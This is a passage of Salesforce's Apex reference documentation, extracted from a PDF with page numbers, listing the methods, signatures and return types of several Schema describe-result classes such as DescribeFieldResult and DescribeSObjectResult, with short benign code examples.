The getColors method of the Schema.DescribeTabResult class returns a list of Schema.DescribeColorResult
objects that describe colors used in a tab.
The methods in the Schema.DescribeColorResult class can be called using their property counterparts. For each method
starting with get, you can omit the get prefix and the ending parentheses () to call the property counterpart. For example,
colorResultObj.color is equivalent to colorResultObj.getColor().
Example
This sample shows how to get the color information in the Sales app for the first tabs first color.
// Get tab set describes for each app
List<Schema.DescribeTabSetResult> tabSetDesc = Schema.DescribeTabs();
// Iterate through each tab set describe for each app and display the info
for(Schema.DescribeTabSetResult tsr : tabSetDesc) {
// Display tab info for the Sales app
if (tsr.getLabel() == 'Sales') {
// Get color information for the first tab
List<Schema.DescribeColorResult> colorDesc = tsr.getTabs()[0].getColors();
// Display the icon color, theme, and context of the first color returned
System.debug('Color: ' + colorDesc[0].getColor());
System.debug('Theme: ' + colorDesc[0].getTheme());
System.debug('Context: ' + colorDesc[0].getContext());
}
}
//
//
//
//
DescribeColorResult Methods
The following are methods for DescribeColorResult. All are instance methods.
IN THIS SECTION:
getColor()
Returns the Web RGB color code, such as 00FF00.
1279
Reference
DescribeDataCategoryGroupResult Class
getContext()
Returns the color context. The context determines whether the color is the main color for the tab or not.
getTheme()
Returns the color theme.
getColor()
Returns the Web RGB color code, such as 00FF00.
Signature
public String getColor()
Return Value
Type: String
getContext()
Returns the color context. The context determines whether the color is the main color for the tab or not.
Signature
public String getContext()
Return Value
Type: String
getTheme()
Returns the color theme.
Signature
public String getTheme()
Return Value
Type: String
Possible theme values include theme3, theme4, and custom.
theme3 is the Salesforce theme introduced during Spring 10.
theme4 is the Salesforce theme introduced in Winter 14 for the mobile touchscreen version of Salesforce.
custom is the theme name associated with a custom icon.
DescribeDataCategoryGroupResult Class
Contains the list of the category groups associated with KnowledgeArticleVersion and Question.
1280
Reference
DescribeDataCategoryGroupResult Class
Namespace
Schema
Usage
The describeDataCategoryGroups method returns a Schema.DescribeDataCategoryGroupResult object
containing the list of the category groups associated with the specified object.
For additional information and code examples using describeDataCategoryGroups, see Accessing All Data Categories
Associated with an sObject.
Example
The following is an example of how to instantiate a data category group describe result object:
List <String> objType = new List<String>();
objType.add('KnowledgeArticleVersion');
objType.add('Question');
List<Schema.DescribeDataCategoryGroupResult> describeCategoryResult =
Schema.describeDataCategoryGroups(objType);
DescribeDataCategoryGroupResult Methods
The following are methods for DescribeDataCategoryGroupResult. All are instance methods.
IN THIS SECTION:
getCategoryCount()
Returns the number of visible data categories in the data category group.
getDescription()
Returns the description of the data category group.
getLabel()
Returns the label for the data category group used in the Salesforce user interface.
getName()
Returns the unique name used by the API to access to the data category group.
getSobject()
Returns the object name associated with the data category group.
getCategoryCount()
Returns the number of visible data categories in the data category group.
Signature
public Integer getCategoryCount()
1281
Reference
DescribeDataCategoryGroupResult Class
Return Value
Type: Integer
getDescription()
Returns the description of the data category group.
Signature
public String getDescription()
Return Value
Type: String
getLabel()
Returns the label for the data category group used in the Salesforce user interface.
Signature
public String getLabel()
Return Value
Type: String
getName()
Returns the unique name used by the API to access to the data category group.
Signature
public String getName()
Return Value
Type: String
getSobject()
Returns the object name associated with the data category group.
Signature
public String getSobject()
Return Value
Type: String
1282
Reference
DescribeDataCategoryGroupStructureResult Class
DescribeDataCategoryGroupStructureResult Class
Contains the category groups and categories associated with KnowledgeArticleVersion and Question.
Namespace
Schema
Usage
The describeDataCategoryGroupStructures method returns a list of Schema.Describe
DataCategoryGroupStructureResult objects containing the category groups and categories associated with the specified
object.
For additional information and code examples, see Accessing All Data Categories Associated with an sObject.
Example
The following is an example of how to instantiate a data category group structure describe result object:
List <DataCategoryGroupSobjectTypePair> pairs =
new List<DataCategoryGroupSobjectTypePair>();
DataCategoryGroupSobjectTypePair pair1 =
new DataCategoryGroupSobjectTypePair();
pair1.setSobject('KnowledgeArticleVersion');
pair1.setDataCategoryGroupName('Regions');
DataCategoryGroupSobjectTypePair pair2 =
new DataCategoryGroupSobjectTypePair();
pair2.setSobject('Questions');
pair2.setDataCategoryGroupName('Regions');
pairs.add(pair1);
pairs.add(pair2);
List<Schema.DescribeDataCategoryGroupStructureResult>results =
Schema.describeDataCategoryGroupStructures(pairs, true);
DescribeDataCategoryGroupStructureResult Methods
The following are methods for DescribeDataCategoryGroupStructureResult. All are instance methods.
IN THIS SECTION:
getDescription()
Returns the description of the data category group.
getLabel()
Returns the label for the data category group used in the Salesforce user interface.
getName()
Returns the unique name used by the API to access to the data category group.
1283
Reference
DescribeDataCategoryGroupStructureResult Class
getSobject()
Returns the name of object associated with the data category group.
getTopCategories()
Returns a Schema.DataCategory object, that contains the top categories visible depending on the user's data category group
visibility settings.
getDescription()
Returns the description of the data category group.
Signature
public String getDescription()
Return Value
Type: String
getLabel()
Returns the label for the data category group used in the Salesforce user interface.
Signature
public String getLabel()
Return Value
Type: String
getName()
Returns the unique name used by the API to access to the data category group.
Signature
public String getName()
Return Value
Type: String
getSobject()
Returns the name of object associated with the data category group.
Signature
public String getSobject()
1284
Reference
DescribeFieldResult Class
Return Value
Type: String
getTopCategories()
Returns a Schema.DataCategory object, that contains the top categories visible depending on the user's data category group
visibility settings.
Signature
public List<Schema.DataCategory> getTopCategories()
Return Value
Type: List<Schema.DataCategory>
Usage
For more information on data category group visibility, see About Category Group Visibility in the Salesforce online help.
DescribeFieldResult Class
Contains methods for describing sObject fields.
Namespace
Schema
Example
The following is an example of how to instantiate a field describe result object:
Schema.DescribeFieldResult dfr = Account.Description.getDescribe();
DescribeFieldResult Methods
The following are methods for DescribeFieldResult. All are instance methods.
IN THIS SECTION:
getByteLength()
For variable-length fields (including binary fields), returns the maximum size of the field, in bytes.
getCalculatedFormula()
Returns the formula specified for this field.
getController()
Returns the token of the controlling field.
getDefaultValue()
Returns the default value for this field.
1285
Reference
DescribeFieldResult Class
getDefaultValueFormula()
Returns the default value specified for this field if a formula is not used.
getDigits()
Returns the maximum number of digits specified for the field. This method is only valid with Integer fields.
getInlineHelpText()
Returns the content of the field-level help.
getLabel()
Returns the text label that is displayed next to the field in the Salesforce user interface. This label can be localized.
getLength()
For string fields, returns the maximum size of the field in Unicode characters (not bytes).
getLocalName()
Returns the name of the field, similar to the getName method. However, if the field is part of the current namespace, the namespace
portion of the name is omitted.
getName()
Returns the field name used in Apex.
getPicklistValues()
Returns a list of PicklistEntry objects. A runtime error is returned if the field is not a picklist.
getPrecision()
For fields of type Double, returns the maximum number of digits that can be stored, including all numbers to the left and to the
right of the decimal point (but excluding the decimal point character).
getReferenceTargetField()
Returns the name of the custom field on the parent standard or custom object whose values are matched against the values of the
child external object's indirect lookup relationship field. The match is done to determine which records are related to each other.
getReferenceTo()
Returns a list of Schema.sObjectType objects for the parent objects of this field. If the isNamePointing method returns true,
there is more than one entry in the list, otherwise there is only one.
getRelationshipName()
Returns the name of the relationship.
getRelationshipOrder()
Returns 1 if the field is a child, 0 otherwise.
getScale()
For fields of type Double, returns the number of digits to the right of the decimal point. Any extra digits to the right of the decimal
point are truncated.
getSOAPType()
Returns one of the SoapType enum values, depending on the type of field.
getSObjectField()
Returns the token for this field.
getType()
Returns one of the DisplayType enum values, depending on the type of field.
isAccessible()
Returns true if the current user can see this field, false otherwise.
1286
Reference
DescribeFieldResult Class
isAutoNumber()
Returns true if the field is an Auto Number field, false otherwise.
isCalculated()
Returns true if the field is a custom formula field, false otherwise. Note that custom formula fields are always read-only.
isCascadeDelete()
Returns true if the child object is deleted when the parent object is deleted, false otherwise.
isCaseSensitive()
Returns true if the field is case sensitive, false otherwise.
isCreateable()
Returns true if the field can be created by the current user, false otherwise.
isCustom()
Returns true if the field is a custom field, false if it is a standard field, such as Name.
isDefaultedOnCreate()
Returns true if the field receives a default value when created, false otherwise.
isDependentPicklist()
Returns true if the picklist is a dependent picklist, false otherwise.
isDeprecatedAndHidden()
Reserved for future use.
isExternalID()
Returns true if the field is used as an external ID, false otherwise.
isFilterable()
Returns true if the field can be used as part of the filter criteria of a WHERE statement, false otherwise.
isGroupable()
Returns true if the field can be included in the GROUP BY clause of a SOQL query, false otherwise. This method is only
available for Apex classes and triggers saved using API version 18.0 and higher.
isHtmlFormatted()
Returns true if the field has been formatted for HTML and should be encoded for display in HTML, false otherwise. One example
of a field that returns true for this method is a hyperlink custom formula field. Another example is a custom formula field that has
an IMAGE text function.
isIdLookup()
Returns true if the field can be used to specify a record in an upsert method, false otherwise.
isNameField()
Returns true if the field is a name field, false otherwise.
isNamePointing()
Returns true if the field can have multiple types of objects as parents. For example, a task can have both the Contact/Lead
ID (WhoId) field and the Opportunity/Account ID (WhatId) field return true for this method. because either of
those objects can be the parent of a particular task record. This method returns false otherwise.
isNillable()
Returns true if the field is nillable, false otherwise. A nillable field can have empty content. A non-nillable field must have a
value for the object to be created or saved.
1287
Reference
DescribeFieldResult Class
isPermissionable()
Returns true if field permissions can be specified for the field, false otherwise.
isRestrictedDelete()
Returns true if the parent object can't be deleted because it is referenced by a child object, false otherwise.
isRestrictedPicklist()
Returns true if the field is a restricted picklist, false otherwise
isSortable()
Returns true if a query can sort on the field, false otherwise
isUnique()
Returns true if the value for the field must be unique, false otherwise
isUpdateable()
Returns true if the field can be edited by the current user, or child records in a master-detail relationship field on a custom object
can be reparented to different parent records; false otherwise.
isWriteRequiresMasterRead()
Returns true if writing to the detail object requires read sharing instead of read/write sharing of the parent.
getByteLength()
For variable-length fields (including binary fields), returns the maximum size of the field, in bytes.
Signature
public Integer getByteLength()
Return Value
Type: Integer
getCalculatedFormula()
Returns the formula specified for this field.
Signature
public String getCalculatedFormula()
Return Value
Type: String
getController()
Returns the token of the controlling field.
Signature
public Schema.sObjectField getController()
1288
Reference
DescribeFieldResult Class
Return Value
Type: Schema.SObjectField
getDefaultValue()
Returns the default value for this field.
Signature
public Object getDefaultValue()
Return Value
Type: Object
getDefaultValueFormula()
Returns the default value specified for this field if a formula is not used.
Signature
public String getDefaultValueFormula()
Return Value
Type: String
getDigits()
Returns the maximum number of digits specified for the field. This method is only valid with Integer fields.
Signature
public Integer getDigits()
Return Value
Type: Integer
getInlineHelpText()
Returns the content of the field-level help.
Signature
public String getInlineHelpText()
Return Value
Type: String
1289
Reference
DescribeFieldResult Class
Usage
For more information, see Defining Field-Level Help in the Salesforce online help.
getLabel()
Returns the text label that is displayed next to the field in the Salesforce user interface. This label can be localized.
Signature
public String getLabel()
Return Value
Type: String
Usage
Note: For the Type field on standard objects, getLabel returns a label different from the default label. It returns a label of the
form Object Type, where Object is the standard object label. For example, for the Type field on Account, getLabel returns
Account Type instead of the default label Type. If the Type label is renamed, getLabel returns the new label. You can
check or change the labels of all standard object fields by choosing Customize > Tab Names and Labels > Rename Tabs and
Labels.
getLength()
For string fields, returns the maximum size of the field in Unicode characters (not bytes).
Signature
public Integer getLength()
Return Value
Type: Integer
getLocalName()
Returns the name of the field, similar to the getName method. However, if the field is part of the current namespace, the namespace
portion of the name is omitted.
Signature
public String getLocalName()
Return Value
Type: String
1290
Reference
DescribeFieldResult Class
getName()
Returns the field name used in Apex.
Signature
public String getName()
Return Value
Type: String
getPicklistValues()
Returns a list of PicklistEntry objects. A runtime error is returned if the field is not a picklist.
Signature
public List<Schema.PicklistEntry> getPicklistValues()
Return Value
Type: List<Schema.PicklistEntry>
getPrecision()
For fields of type Double, returns the maximum number of digits that can be stored, including all numbers to the left and to the right
of the decimal point (but excluding the decimal point character).
Signature
public Integer getPrecision()
Return Value
Type: Integer
getReferenceTargetField()
Returns the name of the custom field on the parent standard or custom object whose values are matched against the values of the child
external object's indirect lookup relationship field. The match is done to determine which records are related to each other.
Signature
public String getReferenceTargetField()
Return Value
Type: String
1291
Reference
DescribeFieldResult Class
Usage
For information about indirect lookup relationships, see Indirect Lookup Relationship Fields on Lightning Connect External Objects in
the Salesforce Help.
getReferenceTo()
Returns a list of Schema.sObjectType objects for the parent objects of this field. If the isNamePointing method returns true,
there is more than one entry in the list, otherwise there is only one.
Signature
public List <Schema.sObjectType> getReferenceTo()
Return Value
Type: List<Schema.sObjectType>
getRelationshipName()
Returns the name of the relationship.
Signature
public String getRelationshipName()
Return Value
Type: String
Usage
For more information about relationships and relationship names, see Understanding Relationship Names in the Force.com SOQL and
SOSL Reference.
getRelationshipOrder()
Returns 1 if the field is a child, 0 otherwise.
Signature
public Integer getRelationshipOrder()
Return Value
Type: Integer
Usage
For more information about relationships and relationship names, see Understanding Relationship Names in the Force.com SOQL and
SOSL Reference.
1292
Reference
DescribeFieldResult Class
getScale()
For fields of type Double, returns the number of digits to the right of the decimal point. Any extra digits to the right of the decimal point
are truncated.
Signature
public Integer getScale()
Return Value
Type: Integer
Usage
This method returns a fault response if the number has too many digits to the left of the decimal point.
getSOAPType()
Returns one of the SoapType enum values, depending on the type of field.
Signature
public Schema.SOAPType getSOAPType()
Return Value
Type: Schema.SOAPType
getSObjectField()
Returns the token for this field.
Signature
public Schema.sObjectField getSObjectField()
Return Value
Type: Schema.SObjectField
getType()
Returns one of the DisplayType enum values, depending on the type of field.
Signature
public Schema.DisplayType getType()
1293
Reference
DescribeFieldResult Class
Return Value
Type: Schema.DisplayType
isAccessible()
Returns true if the current user can see this field, false otherwise.
Signature
public Boolean isAccessible()
Return Value
Type: Boolean
isAutoNumber()
Returns true if the field is an Auto Number field, false otherwise.
Signature
public Boolean isAutoNumber()
Return Value
Type: Boolean
Usage
Analogous to a SQL IDENTITY type, Auto Number fields are read-only, non-createable text fields with a maximum length of 30 characters.
Auto Number fields are used to provide a unique ID that is independent of the internal object ID (such as a purchase order number or
invoice number). Auto Number fields are configured entirely in the Salesforce user interface.
isCalculated()
Returns true if the field is a custom formula field, false otherwise. Note that custom formula fields are always read-only.
Signature
public Boolean isCalculated()
Return Value
Type: Boolean
isCascadeDelete()
Returns true if the child object is deleted when the parent object is deleted, false otherwise.
1294
Reference
DescribeFieldResult Class
Signature
public Boolean isCascadeDelete()
Return Value
Type: Boolean
isCaseSensitive()
Returns true if the field is case sensitive, false otherwise.
Signature
public Boolean isCaseSensitive()
Return Value
Type: Boolean
isCreateable()
Returns true if the field can be created by the current user, false otherwise.
Signature
public Boolean isCreateable()
Return Value
Type: Boolean
isCustom()
Returns true if the field is a custom field, false if it is a standard field, such as Name.
Signature
public Boolean isCustom()
Return Value
Type: Boolean
isDefaultedOnCreate()
Returns true if the field receives a default value when created, false otherwise.
Signature
public Boolean isDefaultedOnCreate()
1295
Reference
DescribeFieldResult Class
Return Value
Type: Boolean
Usage
If this method returns true, Salesforce implicitly assigns a value for this field when the object is created, even if a value for this field is
not passed in on the create call. For example, in the Opportunity object, the Probability field has this attribute because its value is derived
from the Stage field. Similarly, the Owner has this attribute on most objects because its value is derived from the current user (if the
Owner field is not specified).
isDependentPicklist()
Returns true if the picklist is a dependent picklist, false otherwise.
Signature
public Boolean isDependentPicklist()
Return Value
Type: Boolean
isDeprecatedAndHidden()
Reserved for future use.
Signature
public Boolean isDeprecatedAndHidden()
Return Value
Type: Boolean
isExternalID()
Returns true if the field is used as an external ID, false otherwise.
Signature
public Boolean isExternalID()
Return Value
Type: Boolean
isFilterable()
Returns true if the field can be used as part of the filter criteria of a WHERE statement, false otherwise.
1296
Reference
DescribeFieldResult Class
Signature
public Boolean isFilterable()
Return Value
Type: Boolean
isGroupable()
Returns true if the field can be included in the GROUP BY clause of a SOQL query, false otherwise. This method is only available
for Apex classes and triggers saved using API version 18.0 and higher.
Signature
public Boolean isGroupable()
Return Value
Type: Boolean
isHtmlFormatted()
Returns true if the field has been formatted for HTML and should be encoded for display in HTML, false otherwise. One example
of a field that returns true for this method is a hyperlink custom formula field. Another example is a custom formula field that has an
IMAGE text function.
Signature
public Boolean isHtmlFormatted()
Return Value
Type: Boolean
isIdLookup()
Returns true if the field can be used to specify a record in an upsert method, false otherwise.
Signature
public Boolean isIdLookup()
Return Value
Type: Boolean
isNameField()
Returns true if the field is a name field, false otherwise.
1297
Reference
DescribeFieldResult Class
Signature
public Boolean isNameField()
Return Value
Type: Boolean
Usage
This method is used to identify the name field for standard objects (such as AccountName for an Account object) and custom objects.
Objects can only have one name field, except where the FirstName and LastName fields are used instead (such as on the Contact
object).
If a compound name is present, for example, the Name field on a person account, isNameField is set to true for that record.
isNamePointing()
Returns true if the field can have multiple types of objects as parents. For example, a task can have both the Contact/Lead ID
(WhoId) field and the Opportunity/Account ID (WhatId) field return true for this method. because either of those objects
can be the parent of a particular task record. This method returns false otherwise.
Signature
public Boolean isNamePointing()
Return Value
Type: Boolean
isNillable()
Returns true if the field is nillable, false otherwise. A nillable field can have empty content. A non-nillable field must have a value
for the object to be created or saved.
Signature
public Boolean isNillable()
Return Value
Type: Boolean
isPermissionable()
Returns true if field permissions can be specified for the field, false otherwise.
Signature
public Boolean isPermissionable()
1298
Reference
DescribeFieldResult Class
Return Value
Type: Boolean
isRestrictedDelete()
Returns true if the parent object can't be deleted because it is referenced by a child object, false otherwise.
Signature
public Boolean isRestrictedDelete()
Return Value
Type: Boolean
isRestrictedPicklist()
Returns true if the field is a restricted picklist, false otherwise
Signature
public Boolean isRestrictedPicklist()
Return Value
Type: Boolean
isSortable()
Returns true if a query can sort on the field, false otherwise
Signature
public Boolean isSortable()
Return Value
Type: Boolean
isUnique()
Returns true if the value for the field must be unique, false otherwise
Signature
public Boolean isUnique()
Return Value
Type: Boolean
1299
Reference
DescribeIconResult Class
isUpdateable()
Returns true if the field can be edited by the current user, or child records in a master-detail relationship field on a custom object can
be reparented to different parent records; false otherwise.
Signature
public Boolean isUpdateable()
Return Value
Type: Boolean
isWriteRequiresMasterRead()
Returns true if writing to the detail object requires read sharing instead of read/write sharing of the parent.
Signature
public Boolean isWriteRequiresMasterRead()
Return Value
Type: Boolean
DescribeIconResult Class
Contains icon metadata information for a tab.
Namespace
Schema
Usage
The getIcons method of the Schema.DescribeTabResult class returns a list of Schema.DescribeIconResult
objects that describe colors used in a tab.
The methods in the Schema.DescribeIconResult class can be called using their property counterparts. For each method
starting with get, you can omit the get prefix and the ending parentheses () to call the property counterpart. For example,
iconResultObj.url is equivalent to iconResultObj.getUrl().
Example
This sample shows how to get the icon information in the Sales app for the first tabs first icon.
// Get tab set describes for each app
List<Schema.DescribeTabSetResult> tabSetDesc = Schema.describeTabs();
// Iterate through each tab set
for(Schema.DescribeTabSetResult tsr : tabSetDesc) {
1300
Reference
DescribeIconResult Class
DescribeIconResult Methods
The following are methods for DescribeIconResult. All are instance methods.
IN THIS SECTION:
getContentType()
Returns the tab icons content type, such as image/png.
getHeight()
Returns the tab icons height in pixels.
getTheme()
Returns the tabs icon theme.
getUrl()
Returns the tabs icon fully qualified URL.
getWidth()
Returns the tabs icon width in pixels.
getContentType()
Returns the tab icons content type, such as image/png.
Signature
public String getContentType()
Return Value
Type: String
getHeight()
Returns the tab icons height in pixels.
1301
Reference
DescribeIconResult Class
Signature
public Integer getHeight()
Return Value
Type: Integer
Usage
Note: If the icon content type is SVG, the icon wont have a size and its height is zero.
getTheme()
Returns the tabs icon theme.
Signature
public String getTheme()
Return Value
Type: String
Possible theme values include theme3, theme4, and custom.
theme3 is the Salesforce theme introduced during Spring 10.
theme4 is the Salesforce theme introduced in Winter 14 for the mobile touchscreen version of Salesforce.
custom is the theme name associated with a custom icon.
getUrl()
Returns the tabs icon fully qualified URL.
Signature
public String getUrl()
Return Value
Type: String
getWidth()
Returns the tabs icon width in pixels.
Signature
public Integer getWidth()
1302
Reference
DescribeSObjectResult Class
Return Value
Type: Integer
Usage
Note: If the icon content type is SVG, the icon wont have a size and its width is zero.
DescribeSObjectResult Class
Contains methods for describing sObjects.
Namespace
Schema
Usage
None of the methods take an argument.
DescribeSObjectResult Methods
The following are methods for DescribeSObjectResult. All are instance methods.
IN THIS SECTION:
fields()
Returns a special data type that should not be used by itself. Instead, fields should always be followed by either a field member
variable name or the getMap method.
fieldSets()
Returns a special data type that should not be used by itself. Instead, fieldSets should always be followed by either a field set
name or the getMap method.
getChildRelationships()
Returns a list of child relationships, which are the names of the sObjects that have a foreign key to the sObject being described.
getKeyPrefix()
Returns the three-character prefix code for the object. Record IDs are prefixed with three-character codes that specify the type of
the object (for example, accounts have a prefix of 001 and opportunities have a prefix of 006).
getLabel()
Returns the object's label, which may or may not match the object name.
getLabelPlural()
Returns the object's plural label, which may or may not match the object name.
getLocalName()
Returns the name of the object, similar to the getName method. However, if the object is part of the current namespace, the
namespace portion of the name is omitted.
getName()
Returns the name of the object.
1303
Reference
DescribeSObjectResult Class
getRecordTypeInfos()
Returns a list of the record types supported by this object. The current user is not required to have access to a record type to see it
in this list.
getRecordTypeInfosById()
Returns a map that matches record IDs to their associated record types. The current user is not required to have access to a record
type to see it in this map.
getRecordTypeInfosByName()
Returns a map that matches record labels to their associated record type. The current user is not required to have access to a record
type to see it in this map.
getSobjectType()
Returns the Schema.SObjectType object for the sObject. You can use this to create a similar sObject.
isAccessible()
Returns true if the current user can see this field, false otherwise.
isCreateable()
Returns true if the object can be created by the current user, false otherwise.
isCustom()
Returns true if the object is a custom object, false if it is a standard object.
isCustomSetting()
Returns true if the object is a custom setting, false otherwise.
isDeletable()
Returns true if the object can be deleted by the current user, false otherwise.
isDeprecatedAndHidden()
Reserved for future use.
isFeedEnabled()
Returns true if Chatter feeds are enabled for the object, false otherwise. This method is only available for Apex classes and
triggers saved using SalesforceAPI version 19.0 and later.
isMergeable()
Returns true if the object can be merged with other objects of its type by the current user, false otherwise. true is returned
for leads, contacts, and accounts.
isQueryable()
Returns true if the object can be queried by the current user, false otherwise
isSearchable()
Returns true if the object can be searched by the current user, false otherwise.
isUndeletable()
Returns true if the object cannot be undeleted by the current user, false otherwise.
isUpdateable()
Returns true if the object can be updated by the current user, false otherwise.
fields()
Returns a special data type that should not be used by itself. Instead, fields should always be followed by either a field member
variable name or the getMap method.
1304
Reference
DescribeSObjectResult Class
Signature
public Schema.SObjectTypeFields fields()
Return Value
Type: Schema.SObjectTypeFields
The return value is a special data type that should not be used by itself.
Usage
Note: When you describe sObjects and their fields from within an Apex class, custom fields of new field types are returned
regardless of the API version that the class is saved in. If a field type, such as the geolocation field type, is available only in a recent
API version, components of a geolocation field are returned even if the class is saved in an earlier API version.
For more information, see Understanding Apex Describe Information.
Example
Schema.DescribeFieldResult dfr = Schema.SObjectType.Account.fields.Name;
fieldSets()
Returns a special data type that should not be used by itself. Instead, fieldSets should always be followed by either a field set name
or the getMap method.
Signature
public Schema.SObjectTypeFields fieldSets()
Return Value
Type: Schema.SObjectTypeFields
The return value is a special data type that should not be used by itself.
Example
Schema.DescribeSObjectResult d =
Account.sObjectType.getDescribe();
Map<String, Schema.FieldSet> FsMap =
d.fieldSets.getMap();
getChildRelationships()
Returns a list of child relationships, which are the names of the sObjects that have a foreign key to the sObject being described.
Signature
public Schema.ChildRelationship getChildRelationships()
1305
Reference
DescribeSObjectResult Class
Return Value
Type: List<Schema.ChildRelationship>
Example
For example, the Account object includes Contacts and Opportunities as child relationships.
getKeyPrefix()
Returns the three-character prefix code for the object. Record IDs are prefixed with three-character codes that specify the type of the
object (for example, accounts have a prefix of 001 and opportunities have a prefix of 006).
Signature
public String getKeyPrefix()
Return Value
Type: String
Usage
The DescribeSobjectResult object returns a value for objects that have a stable prefix. For object types that do not have a stable or
predictable prefix, this field is blank. Client applications that rely on these codes can use this way of determining object type to ensure
forward compatibility.
getLabel()
Returns the object's label, which may or may not match the object name.
Signature
public String getLabel()
Return Value
Type: String
Usage
The object's label might not always match the object name. For example, an organization in the medical industry might change the
label for Account to Patient. This label is then used in the Salesforce user interface. See the Salesforce online help for more information.
getLabelPlural()
Returns the object's plural label, which may or may not match the object name.
Signature
public String getLabelPlural()
1306
Reference
DescribeSObjectResult Class
Return Value
Type: String
Usage
The object's plural label might not always match the object name. For example, an organization in the medical industry might change
the plural label for Account to Patients. This label is then used in the Salesforce user interface. See the Salesforce online help for more
information.
getLocalName()
Returns the name of the object, similar to the getName method. However, if the object is part of the current namespace, the namespace
portion of the name is omitted.
Signature
public String getLocalName()
Return Value
Type: String
getName()
Returns the name of the object.
Signature
public String getName()
Return Value
Type: String
getRecordTypeInfos()
Returns a list of the record types supported by this object. The current user is not required to have access to a record type to see it in
this list.
Signature
public List<Schema.RecordTypeInfo> getRecordTypeInfos()
Return Value
Type: List<Schema.RecordTypeInfo>
1307
Reference
DescribeSObjectResult Class
getRecordTypeInfosById()
Returns a map that matches record IDs to their associated record types. The current user is not required to have access to a record type
to see it in this map.
Signature
public Schema.RecordTypeInfo getRecordTypeInfosById()
Return Value
Type: Map<ID, Schema.RecordTypeInfo>
getRecordTypeInfosByName()
Returns a map that matches record labels to their associated record type. The current user is not required to have access to a record type
to see it in this map.
Signature
public Schema.RecordTypeInfo getRecordTypeInfosByName()
Return Value
Type: Map<String, Schema.RecordTypeInfo>
getSobjectType()
Returns the Schema.SObjectType object for the sObject. You can use this to create a similar sObject.
Signature
public Schema.SObjectType getSobjectType()
Return Value
Type: Schema.SObjectType
isAccessible()
Returns true if the current user can see this field, false otherwise.
Signature
public Boolean isAccessible()
Return Value
Type: Boolean
1308
Reference
DescribeSObjectResult Class
isCreateable()
Returns true if the object can be created by the current user, false otherwise.
Signature
public Boolean isCreateable()
Return Value
Type: Boolean
isCustom()
Returns true if the object is a custom object, false if it is a standard object.
Signature
public Boolean isCustom()
Return Value
Type: Boolean
isCustomSetting()
Returns true if the object is a custom setting, false otherwise.
Signature
public Boolean isCustomSetting()
Return Value
Type: Boolean
isDeletable()
Returns true if the object can be deleted by the current user, false otherwise.
Signature
public Boolean isDeletable()
Return Value
Type: Boolean
isDeprecatedAndHidden()
Reserved for future use.
1309
Reference
DescribeSObjectResult Class
Signature
public Boolean isDeprecatedAndHidden()
Return Value
Type: Boolean
isFeedEnabled()
Returns true if Chatter feeds are enabled for the object, false otherwise. This method is only available for Apex classes and triggers
saved using SalesforceAPI version 19.0 and later.
Signature
public Boolean isFeedEnabled()
Return Value
Type: Boolean
isMergeable()
Returns true if the object can be merged with other objects of its type by the current user, false otherwise. true is returned for
leads, contacts, and accounts.
Signature
public Boolean isMergeable()
Return Value
Type: Boolean
isQueryable()
Returns true if the object can be queried by the current user, false otherwise
Signature
public Boolean isQueryable()
Return Value
Type: Boolean
isSearchable()
Returns true if the object can be searched by the current user, false otherwise.
1310
Reference
DescribeTabResult Class
Signature
public Boolean isSearchable()
Return Value
Type: Boolean
isUndeletable()
Returns true if the object cannot be undeleted by the current user, false otherwise.
Signature
public Boolean isUndeletable()
Return Value
Type: Boolean
isUpdateable()
Returns true if the object can be updated by the current user, false otherwise.
Signature
public Boolean isUpdateable()
Return Value
Type: Boolean
DescribeTabResult Class
Contains tab metadata information for a tab in a standard or custom app available in the Salesforce user interface.
Namespace
Schema
Usage
The getTabs method of the Schema.DescribeTabSetResult returns a list of Schema.DescribeTabResult objects
that describe the tabs of one app.
The methods in the Schema.DescribeTabResult class can be called using their property counterparts. For each method starting
with get, you can omit the get prefix and the ending parentheses () to call the property counterpart. For example,
tabResultObj.label is equivalent to tabResultObj.getLabel(). Similarly, for each method starting with is, omit
the is prefix and the ending parentheses (). For example, tabResultObj.isCustom is equivalent to
tabResultObj.custom.
1311
Reference
DescribeTabResult Class
DescribeTabResult Methods
The following are methods for DescribeTabResult. All are instance methods.
IN THIS SECTION:
getColors()
Returns a list of color metadata information for all colors associated with this tab. Each color is associated with a theme and context.
getIconUrl()
Returns the URL for the main 32 x 32-pixel icon for a tab. This icon corresponds to the current theme (theme3) and appears next to
the heading at the top of most pages.
getIcons()
Returns a list of icon metadata information for all icons associated with this tab. Each icon is associated with a theme and context.
getLabel()
Returns the display label of this tab.
getMiniIconUrl()
Returns the URL for the 16 x 16-pixel icon that represents a tab. This icon corresponds to the current theme (theme3) and appears
in related lists and other locations.
getSobjectName()
Returns the name of the sObject that is primarily displayed on this tab (for tabs that display a particular SObject).
getUrl()
Returns a fully qualified URL for viewing this tab.
isCustom()
Returns true if this is a custom tab, or false if this is a standard tab.
getColors()
Returns a list of color metadata information for all colors associated with this tab. Each color is associated with a theme and context.
Signature
public List<Schema.DescribeColorResult> getColors()
Return Value
Type: List<Schema.DescribeColorResult>
getIconUrl()
Returns the URL for the main 32 x 32-pixel icon for a tab. This icon corresponds to the current theme (theme3) and appears next to the
heading at the top of most pages.
Signature
public String getIconUrl()
1312
Reference
DescribeTabResult Class
Return Value
Type: String
getIcons()
Returns a list of icon metadata information for all icons associated with this tab. Each icon is associated with a theme and context.
Signature
public List<Schema.DescribeIconResult> getIcons()
Return Value
Type: List<Schema.DescribeIconResult>
getLabel()
Returns the display label of this tab.
Signature
public String getLabel()
Return Value
Type: String
getMiniIconUrl()
Returns the URL for the 16 x 16-pixel icon that represents a tab. This icon corresponds to the current theme (theme3) and appears in
related lists and other locations.
Signature
public String getMiniIconUrl()
Return Value
Type: String
getSobjectName()
Returns the name of the sObject that is primarily displayed on this tab (for tabs that display a particular SObject).
Signature
public String getSobjectName()
1313
Reference
DescribeTabSetResult Class
Return Value
Type: String
getUrl()
Returns a fully qualified URL for viewing this tab.
Signature
public String getUrl()
Return Value
Type: String
isCustom()
Returns true if this is a custom tab, or false if this is a standard tab.
Signature
public Boolean isCustom()
Return Value
Type: Boolean
DescribeTabSetResult Class
Contains metadata information about a standard or custom app available in the Salesforce user interface.
Namespace
Schema
Usage
The Schema.describeTabs method returns a list of Schema.DescribeTabSetResult objects that describe standard
and custom apps.
The methods in the Schema.DescribeTabSetResult class can be called using their property counterparts. For each method
starting with get, you can omit the get prefix and the ending parentheses () to call the property counterpart. For example,
tabSetResultObj.label is equivalent to tabSetResultObj.getLabel(). Similarly, for each method starting with
is, omit the is prefix and the ending parentheses (). For example, tabSetResultObj.isSelected is equivalent to
tabSetResultObj.selected.
1314
Reference
DescribeTabSetResult Class
Example
